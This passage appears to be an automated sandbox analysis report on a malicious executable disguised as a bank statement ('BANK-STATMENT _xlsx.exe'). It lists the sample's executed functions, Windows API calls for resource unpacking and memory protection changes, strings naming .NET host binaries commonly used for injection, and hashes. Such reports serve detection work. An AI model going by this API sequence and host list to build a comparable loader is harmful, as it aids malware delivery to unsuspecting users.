                                                                                • Opcode Fuzzy Hash: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction Fuzzy Hash: 6FD0C7613007021B9F133FA55DC151765885F3D34A700A47EB5016F363DE6ECD181718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: BANK-STATMENT _xlsx.exe PID: 4500 Parent PID: 1496 BANK-STATMENT _xlsx.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00490159, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00490186
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateSection
                                                                                • String ID:
                                                                                • API String ID: 2449625523-0
                                                                                • Opcode ID: 7d616a8db5d0448a1420d80fb182250f662ec4d9038a6abcd0da5041a7f62d4b
                                                                                • Instruction ID: ed1f788a04a4fc99dfff4fe9cab51899918aac264c76607bbf74846170423289
                                                                                • Opcode Fuzzy Hash: 7d616a8db5d0448a1420d80fb182250f662ec4d9038a6abcd0da5041a7f62d4b
                                                                                • Instruction Fuzzy Hash: 6BF04F36101519AFCF029F95EC0089B3BA9FB5A360718443AFA15D7220CB3AD821DFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F4F3, Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 81libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: LibraryLoad$_memset
                                                                                • String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
                                                                                • API String ID: 240438931-1803115895
                                                                                • Opcode ID: 73c82d8e3b47b951a9f4cc2f9c00e8973089907e2b92cb79419427843c3ae47d
                                                                                • Instruction ID: c0dabbacc67b2d426725778b490ac06bdd95f5667b4ab04c32cf67e49d091f9b
                                                                                • Opcode Fuzzy Hash: 73c82d8e3b47b951a9f4cc2f9c00e8973089907e2b92cb79419427843c3ae47d
                                                                                • Instruction Fuzzy Hash: 1D315AB1811219FBCF10DF98DA485EEBBB4EF48318F108466E405BB200D3B89A49CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004907C7, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 187memoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00490039: GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                                  • Part of subcall function 00490039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                                  • Part of subcall function 00490039: SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                                  • Part of subcall function 00490039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                                  • Part of subcall function 00490039: LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                                  • Part of subcall function 0048FED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00490848
                                                                                • VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 00490868
                                                                                  • Part of subcall function 0048FF82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                                • _memset.LIBCMT ref: 0049089F
                                                                                  • Part of subcall function 0048F834: _memset.LIBCMT ref: 0048F869
                                                                                • _memset.LIBCMT ref: 004908F7
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00490919
                                                                                • _memset.LIBCMT ref: 00490945
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0049097B
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0049099D
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe,00000104), ref: 004909DA
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe,00000104), ref: 004909E7
                                                                                • CloseHandle.KERNEL32 ref: 00490A54
                                                                                Strings
                                                                                • C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, xrefs: 004909CF
                                                                                • C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, xrefs: 004909E1
                                                                                • `I, xrefs: 00490825
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
                                                                                • String ID: `I$C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe$C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                                • API String ID: 3419322617-546741878
                                                                                • Opcode ID: d63fb0d63074ba50d38bb95be78e26fa8d392a70f9c5825fc44401a99d96c974
                                                                                • Instruction ID: fa47b57a85d087020d92033c6ce2aeeea61bb3e428919a219cd19c41fd7a2f06
                                                                                • Opcode Fuzzy Hash: d63fb0d63074ba50d38bb95be78e26fa8d392a70f9c5825fc44401a99d96c974
                                                                                • Instruction Fuzzy Hash: 4461A131900258EFCF21EBA1DC85AAE3BA8FB34305F14147BE505E2261D7788A85CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048FB12, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 165fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateFile_memset
                                                                                • String ID: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
                                                                                • API String ID: 3830271748-4283035619
                                                                                • Opcode ID: cb9e5fe3e7d12808937490739dd8b717b2bdc96d76e9703b4b4b647e86b79c74
                                                                                • Instruction ID: 27948e0b197ab65fc848057314db705bc747f7ae27c3443865b2f1a2557d49c9
                                                                                • Opcode Fuzzy Hash: cb9e5fe3e7d12808937490739dd8b717b2bdc96d76e9703b4b4b647e86b79c74
                                                                                • Instruction Fuzzy Hash: 8C51AF5161011A96CF20BF24CC11AFB3662BB34B94B944A77DC4587358F72BDA8AC368
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F6F4, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 110registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0048F71D
                                                                                • _memset.LIBCMT ref: 0048F744
                                                                                • RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0048F76D
                                                                                • _memset.LIBCMT ref: 0048F78B
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00496000,000000FF,?,00000104), ref: 0048F7A9
                                                                                • RegCloseKey.KERNEL32(00000000), ref: 0048F829
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
                                                                                • String ID: InstallRoot$Software\Microsoft\.NETFramework
                                                                                • API String ID: 3047945766-4217373442
                                                                                • Opcode ID: 3604942e84e9f2fe3cbae7702f4ed147f09d9abfb9c1b00c63149748af7d8470
                                                                                • Instruction ID: e213da734bf04768acd83674f95f575279fa158ac3039e7ac73ccee881e432fb
                                                                                • Opcode Fuzzy Hash: 3604942e84e9f2fe3cbae7702f4ed147f09d9abfb9c1b00c63149748af7d8470
                                                                                • Instruction Fuzzy Hash: 7331D472A0021AABDB20AB949C45BEFB7F8EF44754F1041B7F905E3250E7B45E84CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F60E, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ExistsFilePath_memset
                                                                                • String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
                                                                                • API String ID: 4214796376-2149642370
                                                                                • Opcode ID: 0b1a0cd38bcae4b6215c639aca203f86b5e0e48c57dbece2aaf5b58b28472694
                                                                                • Instruction ID: e67d0945219b46a94c3d569c8aac3861b262f67e8beb429f0986b9de818479d6
                                                                                • Opcode Fuzzy Hash: 0b1a0cd38bcae4b6215c639aca203f86b5e0e48c57dbece2aaf5b58b28472694
                                                                                • Instruction Fuzzy Hash: 36219731900209AACF11EFA8D9546FE77B4FF45345F004576E846E7211F7744E4A9B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004901BE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004901FD
                                                                                  • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                  • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                  • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                  • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                                • String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
                                                                                • API String ID: 1620000358-1444991907
                                                                                • Opcode ID: 66be2dd1b25c7051a1f9a2a3cbab56e1b26913e4b7dd0e5cb529b6234ada6842
                                                                                • Instruction ID: db1a365c1f949f841781de154625547609794dc9d783144385055322e9d575ed
                                                                                • Opcode Fuzzy Hash: 66be2dd1b25c7051a1f9a2a3cbab56e1b26913e4b7dd0e5cb529b6234ada6842
                                                                                • Instruction Fuzzy Hash: F14187116101129ECF70AF34CC49AF73A669F34BA4B8446B6DC55CB399F72ACE85C358
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048FD94, Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0048FD9D
                                                                                  • Part of subcall function 0048904F: __FF_MSGBANNER.LIBCMT ref: 00489072
                                                                                  • Part of subcall function 0048904F: __NMSG_WRITE.LIBCMT ref: 00489079
                                                                                  • Part of subcall function 0048904F: RtlAllocateHeap.NTDLL(00000000,?), ref: 004890C6
                                                                                • VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 0048FDB4
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048FDC2
                                                                                • _memset.LIBCMT ref: 0048FE03
                                                                                • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048FE14
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048FE1C
                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048FE23
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
                                                                                • String ID:
                                                                                • API String ID: 851286602-0
                                                                                • Opcode ID: 97e2672645e9c69dc5907727198ace62bff49fbe0b680271770fc1edecf04727
                                                                                • Instruction ID: bcffd8cd40d6532149c6807460895040980dc854defc66bebcdc605edb1d7188
                                                                                • Opcode Fuzzy Hash: 97e2672645e9c69dc5907727198ace62bff49fbe0b680271770fc1edecf04727
                                                                                • Instruction Fuzzy Hash: 7D21B0B6500245AFC711DFA8DD88DAE7BBCEB55600B01467BF60AC62A2E734D604CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00490039, Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                                • FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004900AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
                                                                                • String ID:
                                                                                • API String ID: 3588284000-0
                                                                                • Opcode ID: f921b2cb65fd52afc1d819e75db8ff60ce292697d9ea2d59b90c6a8fe82563d0
                                                                                • Instruction ID: 5ff3337369aea6f0979f138135c280e8d1317291e8a5e21f8052689e222425fe
                                                                                • Opcode Fuzzy Hash: f921b2cb65fd52afc1d819e75db8ff60ce292697d9ea2d59b90c6a8fe82563d0
                                                                                • Instruction Fuzzy Hash: 0401A2757403027FEB322B657C49F6B3A6CAF55B85F100032FB01E5290EAA9CD00427A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004903B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004903D2
                                                                                  • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                  • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                  • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                  • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                • LoadLibraryExW.KERNEL32(?,?,?), ref: 004903F2
                                                                                • StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 00490402
                                                                                  • Part of subcall function 004900F0: CloseHandle.KERNEL32 ref: 004900FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
                                                                                • String ID: \system.ni.dll
                                                                                • API String ID: 2189784845-482435895
                                                                                • Opcode ID: 3be855fd07bef2cddc7d767611ae40822e5f09e6e390b2353af18598a6bde938
                                                                                • Instruction ID: 73b4f87d6250eb690caff7364d9c7fdd069252db4ca6b9fb13f5fea0bc35386b
                                                                                • Opcode Fuzzy Hash: 3be855fd07bef2cddc7d767611ae40822e5f09e6e390b2353af18598a6bde938
                                                                                • Instruction Fuzzy Hash: 08F08231900218BBCF11BFA4CC0AE9F3BACAF14340F004476BE15D6162EA35CA609BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F89E, Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                • EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                • GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                • GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
                                                                                • String ID:
                                                                                • API String ID: 3431743260-0
                                                                                • Opcode ID: c462b2cf8e986fca7a4033d7664763f5ec0a38fef71ee16c3d28f3c4f29a8d27
                                                                                • Instruction ID: 602899437411f3f68849e07e5ee4a6251060a2c53d2113e09e653eef3ff0685e
                                                                                • Opcode Fuzzy Hash: c462b2cf8e986fca7a4033d7664763f5ec0a38fef71ee16c3d28f3c4f29a8d27
                                                                                • Instruction Fuzzy Hash: 4621627154010ABBDF10FB98C985AEEB779EF14344F104876E541E2150D774AE5ACB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F46C, Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                                • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                • String ID:
                                                                                • API String ID: 4115577372-0
                                                                                • Opcode ID: 357a6ccdaf2061e3b522f9c7a71ce9dc8d1bf9ab169af0b1ebaa76324d94e6f3
                                                                                • Instruction ID: 51a07170961e743bd5fb1dd18126475859709b2081fb9dcf01c7a62811403f03
                                                                                • Opcode Fuzzy Hash: 357a6ccdaf2061e3b522f9c7a71ce9dc8d1bf9ab169af0b1ebaa76324d94e6f3
                                                                                • Instruction Fuzzy Hash: B8F0ADB640020ABBCF116FA4CD48ADF7E6CEB14350F004627BA09911A0E735DA44CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048FE5D, Relevance: 4.6, APIs: 3, Instructions: 53libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                • String ID:
                                                                                • API String ID: 310444273-0
                                                                                • Opcode ID: 5b878c4c937de1d72927c3407b9a5848f36b7b1d96b447510dbb1619dd0fa58a
                                                                                • Instruction ID: cb2e00d2c6e3853fe0690655ee8cf266d6c85da39317ad3d0deaead56c4eab32
                                                                                • Opcode Fuzzy Hash: 5b878c4c937de1d72927c3407b9a5848f36b7b1d96b447510dbb1619dd0fa58a
                                                                                • Instruction Fuzzy Hash: 0C112771600216ABDB20EF59C8809BF77E8AF1435471104BAE901E7222F738EE49CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048ABD8, Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,004891FB), ref: 0048ABDB
                                                                                • __malloc_crt.LIBCMT ref: 0048AC09
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048AC16
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                • String ID:
                                                                                • API String ID: 237123855-0
                                                                                • Opcode ID: 908fed19b57f6dbd9b02f5b763521e8ef6996606c57118f80aff5c2c23133449
                                                                                • Instruction ID: 3a599f4cd9a5c1bb63ea8aefedf48ca199ddadc71bbd2992ba8cef025ee73401
                                                                                • Opcode Fuzzy Hash: 908fed19b57f6dbd9b02f5b763521e8ef6996606c57118f80aff5c2c23133449
                                                                                • Instruction Fuzzy Hash: 1AF0E9379040605EA7117A353C4847F166DDA863293164C37F553C3200FA984CD383AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0049034A, Relevance: 4.5, APIs: 3, Instructions: 43libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 00490366
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00490373
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00490381
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                • String ID:
                                                                                • API String ID: 310444273-0
                                                                                • Opcode ID: 48eb0c92a0b51a578db5699f46632ddc89d3dd394b6964f041acfbe2229c28b2
                                                                                • Instruction ID: 76261a61f0ed5c90047b1746fe55b54294cf88d7536e13bfaf44e409294aea42
                                                                                • Opcode Fuzzy Hash: 48eb0c92a0b51a578db5699f46632ddc89d3dd394b6964f041acfbe2229c28b2
                                                                                • Instruction Fuzzy Hash: D0F0A932820228EFCF326F70EC448DF7F69AB40B517208537FC4692125E73989919AC8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F9E9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0048FA13
                                                                                  • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                  • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                  • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                  • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                Strings
                                                                                • C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, xrefs: 0048FA2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                                • String ID: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                                • API String ID: 1620000358-3735718670
                                                                                • Opcode ID: 842b178210db866b2f2be6f39dfcaba4cbfa6a6665f28ad10fb330eeed32ab13
                                                                                • Instruction ID: a4111e1aaaff6485f92680991e2c3f5f6b8aae9cde56256721aaef646297ebb2
                                                                                • Opcode Fuzzy Hash: 842b178210db866b2f2be6f39dfcaba4cbfa6a6665f28ad10fb330eeed32ab13
                                                                                • Instruction Fuzzy Hash: 4F01843551020A9ECF15FF68C848DAF3768EB04318F008972F85AC7211EA34DA65CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048F95F, Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,00000004,?), ref: 0048F981
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0048F9DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 525f77252a9c518c4f5824c71e447e6dc0dca3bb1da0b0ab50a0aa2bf5964490
                                                                                • Instruction ID: 8a8519ee04cf0fdfe50e7ce0800386e52267a6ba67a2fe26ef23db32edde32f4
                                                                                • Opcode Fuzzy Hash: 525f77252a9c518c4f5824c71e447e6dc0dca3bb1da0b0ab50a0aa2bf5964490
                                                                                • Instruction Fuzzy Hash: AB118FB2900205AFDB219F58C880BBA77B8EF45714F04457AE945D7291E334ED44DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004900B9, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 004900E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: d9979fa05ce1dc1c859586d38e44ca7ca340289d5517fa8832bf41a33512b922
                                                                                • Instruction ID: dfb8620630a0cdac6e1c48b5e8b9d9f74ae82449725838133c88a63dc2e8afa5
                                                                                • Opcode Fuzzy Hash: d9979fa05ce1dc1c859586d38e44ca7ca340289d5517fa8832bf41a33512b922
                                                                                • Instruction Fuzzy Hash: C5D01222001926661A157266FC069DF678C9D13374364443BFA05D55429F5C9A9683FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048A12C, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0048A141
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateHeap
                                                                                • String ID:
                                                                                • API String ID: 10892065-0
                                                                                • Opcode ID: 3a4bd739c8ee00cad3feebe758d6a37913103926495479478cd9efa198607957
                                                                                • Instruction ID: 565e0fd7b9501178c149667a35d805a4ff27f116542911f88b1184eabe90f11b
                                                                                • Opcode Fuzzy Hash: 3a4bd739c8ee00cad3feebe758d6a37913103926495479478cd9efa198607957
                                                                                • Instruction Fuzzy Hash: A6D05E765543459AEB109F74AC09B663BDC93943A5F108437B90DC6250F575C9908608
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048AF47, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __encode_pointer.LIBCMT ref: 0048AF49
                                                                                  • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEE7
                                                                                  • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000005,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEFE
                                                                                  • Part of subcall function 0048AED5: RtlEncodePointer.NTDLL(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AF3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 2585649348-0
                                                                                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                • Instruction ID: d00ef9800d0f3221da160c25f2b57490603d93154157223f0d3dd03d3d12f148
                                                                                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048FF82, Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
